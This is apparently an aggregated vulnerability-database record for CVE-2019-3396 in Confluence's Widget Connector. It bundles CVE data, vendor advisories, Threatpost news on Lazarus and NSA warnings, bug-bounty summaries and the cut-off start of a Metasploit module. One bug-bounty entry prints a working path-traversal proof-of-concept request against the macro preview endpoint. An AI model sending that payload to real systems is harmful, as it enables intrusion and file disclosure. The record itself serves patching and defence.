ID AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545 Type attackerkb Reporter AttackerKB Modified 2020-03-03T00:00:00
Description
The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Recent assessments:
J3rryBl4nks at March 03, 2020 3:30pm UTC reported:
Due to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.
There is a public POC available: <https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.
space-r7 at May 22, 2019 1:34pm UTC reported:
Due to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.
There is a public POC available: <https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.
Assessed Attacker Value: 4
asoto-r7 at May 09, 2019 5:57pm UTC reported:
Due to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.
There is a public POC available: <https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.
{"id": "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545", "type": "attackerkb", "bulletinFamily": "info", "title": "Confluence Unauthorized RCE Vulnerability", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 03, 2020 3:30pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available:<https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\n**space-r7** at May 22, 2019 1:34pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available:<https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4**asoto-r7** at May 09, 2019 5:57pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available:<https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4\n", "published": "2019-03-25T00:00:00", "modified": "2020-03-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://attackerkb.com/topics/2uHJW7vbky/confluence-unauthorized-rce-vulnerability", "reporter": 
"AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396", "https://www.exploit-db.com/exploits/46731", "https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html", "https://packetstormsecurity.com/files/152568/Atlassian-Confluence-Widget-Connector-Macro-Velocity-Template-Injection.html"], "cvelist": ["CVE-2019-3396"], "lastseen": "2020-11-18T06:36:12", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA"]}, {"type": "cve", "idList": ["CVE-2019-3396"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-57974", "ATLASSIAN:CONFSERVER-57971"]}, {"type": "dsquare", "idList": ["E-686"]}, {"type": "hackerone", "idList": ["H1:538771", "H1:536130", "H1:518637", "H1:541858"]}, {"type": "canvas", "idList": ["CONFLUENCE_MACRO_LFI"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328"]}, {"type": "fireeye", "idList": ["FIREEYE:B394E05FC4834992E8F05135E3087CAD", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "zdt", "idList": ["1337DAY-ID-32569"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/CONFLUENCE_WIDGET_CONNECTOR"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152568"]}, {"type": "threatpost", "idList": ["THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452"]}, {"type": "nessus", "idList": ["CONFLUENCE_6_6_12.NASL", "CONFLUENCE_CVE-2019-3396.NASL"]}, {"type": "securelist", "idList": ["SECURELIST:9C375DB331E2434EE824100A45629096"]}, {"type": "exploitdb", "idList": ["EDB-ID:46731"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}], "modified": "2020-11-18T06:36:12", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": 
"2020-11-18T06:36:12", "rev": 2}, "vulnersScore": 6.0}, "attackerkb": {"attackerValue": 4, "exploitability": 4}, "wildExploited": false}
{"attackerkb": [{"lastseen": "2020-11-18T06:36:34", "bulletinFamily": "info", "cvelist": ["CVE-2019-3396"], "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:54pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n", "modified": "2019-10-30T00:00:00", "published": "2019-10-30T00:00:00", "id": "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "href": "https://attackerkb.com/topics/8PZOMRtIAA/cve-2019-3396", "type": "attackerkb", "title": "CVE-2019-3396", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T21:41:52", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-25T19:29:00", "title": "CVE-2019-3396", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2019-04-22T16:10:00", "cpe": [], "id": "CVE-2019-3396", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-3396", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "atlassian": [{"lastseen": "2020-12-24T14:35:22", "bulletinFamily": "software", "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "description": "There was a server-side template injection vulnerability in Confluence Server and Data Center, in the Widget Connector. 
An attacker is able to exploit this issue to achieve path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n\r\nAll versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x) and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x).\r\n\r\n\u00a0\r\n\r\n*Fix:*\r\n * Confluence Server version 6.15.1 is available for download from [https://www.atlassian.com/software/confluence/download].\r\n * Confluence Server version 6.14.2 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.13.3 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.12.3 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.6.12 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the full advisory: [https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2019-03-20]\r\n\r\n\u00a0", "edition": 32, "modified": "2020-05-22T08:24:06", "published": "2019-02-28T03:02:04", "id": "ATLASSIAN:CONFSERVER-57974", "href": "https://jira.atlassian.com/browse/CONFSERVER-57974", "title": "Remote code execution via Widget Connector macro - CVE-2019-3396", "type": "atlassian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T14:35:27", "bulletinFamily": "software", "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "description": "There was an SSRF vulnerability in Confluence Server and Data Center in the WebDAV plugin. 
A remote attacker is able to exploit this issue to send arbitrary HTTP and WebDAV requests from a Confluence Server instance.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n * All versions of Confluence Server and Confluence Data Center before version 6.6.7, from version 6.7.0 before 6.8.5 (the fixed version for 6.8.x), from version 6.9.0 before 6.9.3 (the fixed version for 6.9.x).\r\n\r\n\u00a0\r\n\r\n*Fix:*\r\n * Confluence Server version 6.15.1 is available for download from [https://www.atlassian.com/software/confluence/download].\r\n * Confluence Server version 6.14.2 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.13.3 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.12.3 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.6.12 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the full advisory: [https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2019-03-20]\r\n\r\n\u00a0", "edition": 15, "modified": "2020-05-22T08:25:56", "published": "2019-02-27T22:52:13", "id": "ATLASSIAN:CONFSERVER-57971", "href": "https://jira.atlassian.com/browse/CONFSERVER-57971", "title": "SSRF via WebDAV endpoint - CVE-2019-3395", "type": "atlassian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-10-14T22:22:13", "bulletinFamily": "info", "cvelist": ["CVE-2019-3396"], "description": "The North Korea-linked APT known as Lazarus Group has debuted an advanced, multipurpose malware framework, called MATA, to target Windows, Linux and macOS operating systems.\n\nKaspersky researchers uncovered a series of attacks utilizing MATA (so-called because the malware authors 
themselves call their infrastructure MataNet), involving the infiltration of corporate entities around the world in a quest to steal customer databases and distribute ransomware. The framework consists of several components, such as a loader, an orchestrator (which manages and coordinates the processes once a device is infected) and plugins. And according to artifacts in the code, Lazarus has been using it since spring 2018.\n\n\u201cMalicious toolsets used to target multiple platforms are a rare breed, as they require significant investment from the developer,\u201d explained Kaspersky analysts, in a report issued on Wednesday. \u201cThey are often deployed for long-term use, which results in increased profit for the actor through numerous attacks spread over time. In the cases discovered by Kaspersky, the MATA framework was able to target three platforms \u2013 Windows, Linux and macOS \u2013 indicating that the attackers planned to use it for multiple purposes.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs far as victimology, known organizations hit by the MATA framework have been located in Germany, India, Japan, Korea, Turkey and Poland \u2014 indicating that the attacks cast a wide net. Moreover, those victims are in various sectors, and include a software development company, an e-commerce company and an internet service provider.\n\n\u201cFrom one victim, we identified one of their intentions,\u201d according to Kaspersky. \u201cAfter deploying MATA malware and its plugins, the actor attempted to find the victim\u2019s databases and execute several database queries to acquire customer lists. We\u2019re not sure if they completed the exfiltration of the customer database, but it\u2019s certain that customer databases from victims are one of their interests. 
In addition, MATA was used to distribute VHD ransomware to one victim.\u201d\n\n## **Windows Version**\n\nThe Windows version of MATA consists of several components, according to the firm: Most notably, a loader malware, which is used to load an encrypted next-stage payload; and the payload itself, which is likely the orchestrator malware.\n\n\u201cWe\u2019re not sure that the loaded payload is the orchestrator malware, but almost all victims have the loader and orchestrator on the same machine,\u201d the researchers explained.\n\nThe orchestrator loads encrypted configuration data from a registry key and decrypts it with the AES algorithm. It\u2019s purpose is to load various plugins \u2013 up to 15 of them. The perform various functions, including sending the command-and-control (C2) information about the infected host, such as victim ID, internal version number, Windows version, computer name, user name, IP address and MAC address; creating a HTTP proxy server; executing code; manipulating files; and more.\n\nThe parent process that executes the loader malware is the WMI Provider Host process, which usually means the actor has executed malware from a remote host to move laterally, according to Kaspersky \u2013 meaning that additional hosts in the same network could also be infected.\n\n## **Non-Windows versions of MATA**\n\nA Linux version of the MATA orchestrator was seen in December, [uncovered by Netlab](<https://blog.netlab.360.com/dacls-the-dual-platform-rat-en/>) and dubbed DACLs. It was characterized as a remote access trojan (RAT), bundled together with a set of plugins. 
Kaspersky has linked DACLs to MATA, with the Linux MATA version including both a Windows and a Linux orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server ([CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)) and a legitimate [socat tool](<http://www.dest-unreach.org/socat/>).\n\nNote that the Linux version of MATA has a logsend plugin. This plugin implements an interesting new feature, a \u201cscan\u201d command that tries to establish a TCP connection on ports 8291 (used for administration of MikroTik RouterOS devices) and 8292 (\u201cBloomberg Professional\u201d software) and random IP addresses excluding addresses belonging to private networks. Any successful connection is logged and sent to the C2. These logs might be used by attackers for target selection.\n\nThe macOS version of the orchestrator meanwhile was found in April, having been ported from the Linux version. It [was found hiding](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) in a trojanized macOS application based on an open-source two-factor authentication application named MinaOTP. Its plugin list is almost identical to the Linux version, except that it also contains a plugin named \u201cplugin_socks,\u201d responsible for configuring proxy servers.\n\n## **Links to Lazarus**\n\nLazarus Group, a.k.a. Hidden Cobra or APT 38, has been around since 2009. The APT has been linked to the highly destructive [WannaCry](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) attack that caused millions of dollars of economic damage in 2017, the [SWIFT banking attacks](<https://threatpost.com/bangladesh-bank-hackers-accessed-swift-system-to-steal-cover-tracks/117637/>), as well as the high-profile attack against [Sony Pictures Entertainment](<https://threatpost.com/f-b-i-mandiant-investigating-sony-pictures-breach/109645/>) in 2014. 
It even has [spawned a spinoff group](<https://threatpost.com/lazarus-apt-spinoff-linked-to-banking-hacks/124746/>), the entire mission of which is to steal money from banks to fund Lazarus\u2019 cybercriminal operations and the North Korean regime as a whole.\n\nLazarus is also constantly evolving: In December, it was seen hooking up with Trickbot operators, which run [a powerful trojan](<https://threatpost.com/trickbot-malware-now-targets-us-banks/126976/>) that targets U.S. banks and others. In May, it was seen [adding macOS spyware](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) to a two-factor authentication app; and earlier in July, it added [Magecart card-skimming code](<https://threatpost.com/lazarus-group-adds-magecart/157167/>) to its toolbag.\n\nKaspersky has linked the MATA framework to the Lazarus APT group through two unique file names found in the orchestrators: c_2910.cls and k_3872.cls, which have only previously been seen in several variants of the Manuscrypt malware, a known Lazarus tool. Previous research by Netlab also determined the connection between the Linux orchestrator/DACLS RAT and the APT.\n\n\u201cMoreover, MATA uses global configuration data including a randomly generated session ID, date-based version information, a sleep interval and multiple C2s and C2 server addresses,\u201d added the researchers. \u201cWe\u2019ve seen that one of the Manuscrypt variants (ab09f6a249ca88d1a036eee7a02cdd16) shares a similar configuration structure with the MATA framework. This old Manuscrypt variant is an active backdoor that has similar configuration data such as session ID, sleep interval, number of C2 addresses, infected date, and C2 addresses. 
They are not identical, but they have a similar structure.\u201d\n", "modified": "2020-07-22T16:43:44", "published": "2020-07-22T16:43:44", "id": "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "href": "https://threatpost.com/lazarus-group-advanced-malware-framework/157636/", "type": "threatpost", "title": "Lazarus Group Surfaces with Advanced Malware Framework", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T15:51:14", "bulletinFamily": "info", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to 
patch amid this flurry of heightened activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. 
In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. 
An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. 
An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. 
It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. 
\u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "modified": "2020-10-21T20:31:17", "published": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-07-31T14:53:54", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": ["CVE-2019-3396"], "description": "Unpatched CVE-2019-3396 (and few more) in publicly accessible Atlassian Confluence instance in ESForce domain.", "modified": "2019-07-08T15:24:57", "published": "2019-04-11T20:10:37", "id": "H1:536130", "href": "https://hackerone.com/reports/536130", "type": "hackerone", "title": "Mail.ru: Path traversal, SSTI and RCE on a MailRu acquisition ", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-02T16:29:58", "bulletinFamily": "bugbounty", "bounty": 10000.0, "cvelist": ["CVE-2019-3396"], "description": "Confluence widget connector vulnerable to CVE-2019-3396 was available on shared.mail.ru", "modified": "2019-12-02T15:22:35", "published": "2019-03-29T10:45:58", "id": "H1:518637", "href": "https://hackerone.com/reports/518637", "type": "hackerone", "title": "Mail.ru: RCE on shared.mail.ru due to \"widget\" plugin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-05T10:55:11", "bulletinFamily": "bugbounty", "bounty": 750.0, "cvelist": ["CVE-2019-3396"], "description": "Unpatched CVE-2019-3396 in geekbrains.ru", "modified": "2020-10-05T09:43:47", "published": "2019-04-18T08:32:11", "id": "H1:541858", "href": "https://hackerone.com/reports/541858", "type": "hackerone", 
"title": "Mail.ru: [geekbrains.ru] CVE-2019-5418 Ruby on Rails File Content Disclosure", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-04T15:31:46", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": [], "description": "#POC\n\n```\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\nContent-Type: application/json\nContent-Length: 174\n\n{\"contentId\":\"12345\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.youtube.com/watch?v=wHEHYJpCkpg\",\"width\":\"300\",\"height\":\"200\",\"_template\":\"file://../\"}}}\n```\n\nThanks,\nBen\n\n## Impact\n\n#", "modified": "2019-10-04T15:17:21", "published": "2019-04-15T19:06:19", "id": "H1:538771", "href": "https://hackerone.com/reports/538771", "type": "hackerone", "title": "U.S. Dept Of Defense: LFI with potential to RCE on \u2588\u2588\u2588\u2588\u2588\u2588 using CVE-2019-3396", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2019-04-19T03:48:41", "description": "", "published": "2019-04-18T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2019-04-18T00:00:00", "id": "PACKETSTORM:152568", "href": "https://packetstormsecurity.com/files/152568/Atlassian-Confluence-Widget-Connector-Macro-Velocity-Template-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::FtpServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\", 
